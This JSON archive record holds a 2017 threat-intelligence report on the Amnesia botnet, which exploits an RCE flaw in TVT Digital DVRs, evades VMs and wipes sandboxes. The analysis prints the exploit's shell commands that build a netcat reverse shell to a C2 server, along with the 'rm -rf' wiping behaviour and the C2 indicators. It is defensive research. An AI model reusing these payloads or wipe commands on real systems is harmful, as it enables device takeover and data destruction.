{
	"id": "c11562a2-8c85-43b2-bd3f-f1b9d41c9c6a",
	"created_at": "2026-04-06T00:14:16.434129Z",
	"updated_at": "2026-04-10T03:24:18.216448Z",
	"deleted_at": null,
	"sha1_hash": "baf7a6d0f4ee7a8072ea96f969be220722b0ea7b",
	"title": "New IoT/Linux Malware Targets DVRs, Forms Botnet",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 712993,
	"plain_text": "New IoT/Linux Malware Targets DVRs, Forms Botnet\r\nBy Claud Xiao, Cong Zheng\r\nPublished: 2017-04-06 · Archived: 2026-04-05 17:50:43 UTC\r\nUnit 42 researchers have identified a new variant of the IoT/Linux botnet “Tsunami”, which we are calling “Amnesia”. The Amnesia botnet targets an unpatched remote code execution vulnerability that was publicly disclosed over a year ago, in March 2016, in DVR (digital video recorder) devices made by TVT Digital and branded by over 70 vendors worldwide (a listing of which can be found in the original vulnerability report we've linked to). Based on our scan data shown below in Figure 1, this vulnerability affects approximately 227,000 devices around the world, with Taiwan, the United States, Israel, Turkey, and India being the most exposed.\r\nFigure 1  Distribution of Vulnerable TVT Digital's DVR devices\r\nIn addition, we believe the Amnesia malware is the first Linux malware to adopt virtual machine evasion techniques to defeat malware analysis sandboxes. Virtual machine evasion techniques are more commonly associated with Microsoft Windows and Google Android malware. Similar to those, Amnesia tries to detect whether it’s running in a VirtualBox, VMware or QEMU based virtual machine, and if it detects those environments it will wipe the virtualized Linux system by deleting all the files in the file system. This affects not only Linux malware analysis sandboxes but also some QEMU based Linux servers on VPS or on public cloud.\r\nAmnesia exploits this remote code execution vulnerability by scanning for, locating, and attacking vulnerable systems. A successful attack results in Amnesia gaining full control of the device. Attackers could potentially harness the Amnesia botnet to launch broad DDoS attacks similar to the Mirai botnet attacks we saw in Fall 2016.\r\nhttp://researchcenter.paloaltonetworks.com/2017/04/unit42-new-iotlinux-malware-targets-dvrs-forms-botnet/\r\nPage 1 of 9\r\nEven though this vulnerability was disclosed over a year ago, despite our best efforts, we have been unable to find updates that fix this vulnerability.\r\nWhile the Amnesia botnet hasn’t yet been used to mount large scale attacks, the Mirai botnet attacks show the potential harm large-scale IoT-based botnets can cause. Palo Alto Networks recommends all customers ensure they have our latest protections in place. Additionally, everyone should block traffic to Amnesia’s command and control servers (C2s) listed in the Indicators of Compromise (IoC) section of this blog.\r\nTechnical Details\r\nVulnerability Details\r\nOn March 22, 2016, security researcher Rotem Kerner disclosed the vulnerability to the public. According to his blog, over 70 DVR vendors around the world were affected by the vulnerability. However, all the DVR devices were manufactured by the same company, “TVT Digital”. To date, we have been unable to find any patch released by the vendors or the manufacturer to address the vulnerability.\r\nAdditionally, by using the fingerprint of “Cross Web Server”, we discovered over 227,000 devices exposed on the Internet that are likely produced by TVT Digital. We also searched the keyword on Shodan.io and on Censys.io. They reported about 50,000 and about 705,000 IP addresses respectively.\r\nTable 1 shows the top 20 countries for potentially vulnerable TVT Digital DVR devices:\r\n1. Taiwan 47170\r\n2. United States 44179\r\n3. Israel 23355\r\n4. Turkey 11780\r\n5. India 9796\r\n6. Malaysia 9178\r\n7. Mexico 7868\r\n8. Italy 7439\r\n9. Vietnam 6736\r\n10. United Kingdom 4402\r\n11. Russia 3571\r\n12. Hungary 3529\r\n13. France 3165\r\n14. Bulgaria 3040\r\n15. Romania 2783\r\n16. Colombia 2616\r\n17. Egypt 2541\r\n18. Canada 2491\r\n19. Iran 1965\r\n20. Argentina 1748\r\nTable 1  Top 20 Countries for potentially vulnerable TVT Digital DVR Devices\r\nPropagation and Vulnerability Exploitation\r\nAmnesia communicates with its C2 server using the IRC protocol. Figure 2 shows some of the commands it was designed to receive, including commands to launch DDoS attacks by different types of HTTP flooding and UDP flooding.\r\nFigure 2  C2 Commands of Amnesia\r\nIn addition to these commands, two more commands were implemented: CCTVSCANNER and CCTVPROCS. These commands are used for scanning and exploiting the RCE vulnerability in TVT Digital DVRs. After receiving the commands, Amnesia will first make a simple HTTP request to the IP address included with the command, checking whether the target is a vulnerable DVR device. This is done by searching for the special string “Cross Web Server” in the HTTP response content, as shown in Figure 3, since TVT Digital’s DVRs use this string as the server name in the HTTP header.\r\nFigure 3  Check whether the target is a vulnerable DVR\r\nIf a vulnerable DVR is found, Amnesia will send four more HTTP requests, which contain exploit payloads of four different shell commands. The commands are:\r\necho \"nc\" \u003e f\r\necho \"{one_of_c2_domains}\" \u003e\u003e f\r\necho \"8888 –e $SHELL\" \u003e\u003e f\r\n$(cat f) \u0026 \u003e r\r\nThese commands create a shell script file and execute it. The script connects to one of the Amnesia C2 servers and exposes the system's default shell. Therefore, the infected devices will be compromised and will listen for further shell commands sent from the C2 servers, as shown in Figure 4.\r\nFigure 4  Exploit the RCE vulnerability\r\nAnti-Forensics\r\nWhen an Amnesia sample executes, it will immediately check whether it’s running in a virtual machine by reading the files /sys/class/dmi/id/product_name and /sys/class/dmi/id/sys_vendor and comparing the file contents with the keywords “VirtualBox”, “VMware” and “QEMU”, as shown in Figure 5. These two files are used by Linux DMI (Desktop Management Interface) to store the hardware’s product and manufacturer information. These strings being included in the DMI files implies that the Linux system is running in a virtual machine based on VirtualBox, VMware or QEMU, respectively.\r\nFigure 5  Inspects DMI files to detect VM\r\nIf a virtual machine is detected, Amnesia will delete itself, and then try to delete all of the following directories:\r\n1. the Linux root directory “/”,\r\n2. the current user’s home directory “~/”, and\r\n3. the current working directory “./”\r\nThese delete operations are basically equivalent to wiping the whole Linux system. They were implemented by simply executing the shell command “rm -rf”, as shown in Figure 6. For each directory, the “rm” command will be executed twice: once in the background, and once in the foreground. Hence, the deletion of the three directories will proceed in parallel. Finally, Amnesia will wait for the delete to finish.\r\nFigure 6  Wipe the Linux system\r\nWe believe the author of Amnesia was aiming to defeat Linux-based malware analysis sandboxes and to cause trouble for security researchers, due to a hard-coded but otherwise useless string in the code: “fxxkwhitehats”. However, VM based sandboxes typically have system snapshots enabled, allowing for quick recovery to the original state (the sample’s analysis task may be ruined though). The impact will be limited in these cases. The real problem is, if the malware infects some QEMU based Linux server instances, such as virtual hosts provided by VPS vendors, the Linux server will also be wiped, which could be catastrophic if backups are not available.\r\nAfter the VM check, Amnesia creates persistence files in /etc/init.d/.rebootime and /etc/cron.daily/.reboottime, or in ~/.bashrc and ~/.bash_history, depending on the current user’s privileges. It then kills all Telnet and SSH related processes, and connects with a C2 server to receive further commands.\r\nAmnesia hard-coded three domain names, such as “irc.freenode.net”, as decoy C2 server addresses. However, the real C2 configuration is decrypted at runtime by a simple Caesar cipher algorithm. It chooses one of these three servers:\r\nukranianhorseriding[.]net\r\nsurrealzxc.co[.]za\r\ninversefierceapplied[.]pw\r\nAll three of these domains have resolved to the same IP address, 93.174.95[.]38, since December 1st, 2016. Before that, the IP address was also used to host other IoT/Linux malware such as DropPerl.\r\nConclusion\r\nBesides the threat that the Amnesia botnet presents, the malware reveals some interesting and notable trends in current IoT/Linux botnet threats:\r\nIoT/Linux malware has begun to adopt classic techniques to evade and even wipe virtual machines.\r\nIoT/Linux malware targets and attacks known remote code execution vulnerabilities in IoT devices. These are typically made by smaller manufacturers, and there may be no patch available.\r\nIoT/Linux malware may also affect Linux servers deployed in VPS or in public cloud.\r\nIn the case of Amnesia, because the malware relies on hard-coded C2 addresses, preventing another Mirai-type attack is possible if these addresses are blocked as broadly as possible, as quickly as possible.\r\nUpdate: After publishing this report, we learned of other researchers’ past work on various aspects of this malware.\r\nAs we mentioned in the introduction, the Tsunami bot has a long history, and this latest version incorporated new features, including a scanner to identify and exploit DVRs for CCTV systems as well as Anti-VM detection capabilities. The CCTV scanning and exploitation technique was previously discussed in these two reports:\r\n8ack - Big Brother is attacking you\r\nCyberX – Radiation Report\r\nResearcher Michal Malik also noted this malware had VM detection capabilities in a Tweet in January:\r\nhttps://twitter.com/michalmalik/status/818182119285473282\r\nProtections\r\nPalo Alto Networks has blocked the domains used by this malware for command and control through PAN-DB and Threat Prevention.\r\nIndicators of Compromise\r\nC2 Domains and IP addresses\r\nukranianhorseriding[.]net\r\nsurrealzxc.co[.]za\r\ninversefierceapplied[.]pw\r\n93.174.95[.]38\r\nAmnesia Sample SHA-256\r\nSource: http://researchcenter.paloaltonetworks.com/2017/04/unit42-new-iotlinux-malware-targets-dvrs-forms-botnet/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"http://researchcenter.paloaltonetworks.com/2017/04/unit42-new-iotlinux-malware-targets-dvrs-forms-botnet/"
	],
	"report_names": [
		"unit42-new-iotlinux-malware-targets-dvrs-forms-botnet"
	],
	"threat_actors": [
		{
			"id": "eb3f4e4d-2573-494d-9739-1be5141cf7b2",
			"created_at": "2022-10-25T16:07:24.471018Z",
			"updated_at": "2026-04-10T02:00:05.002374Z",
			"deleted_at": null,
			"main_name": "Cron",
			"aliases": [],
			"source_name": "ETDA:Cron",
			"tools": [
				"Catelites",
				"Catelites Bot",
				"CronBot",
				"TinyZBot"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434456,
	"ts_updated_at": 1775791458,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/baf7a6d0f4ee7a8072ea96f969be220722b0ea7b.pdf",
		"text": "https://archive.orkl.eu/baf7a6d0f4ee7a8072ea96f969be220722b0ea7b.txt",
		"img": "https://archive.orkl.eu/baf7a6d0f4ee7a8072ea96f969be220722b0ea7b.jpg"
	}
}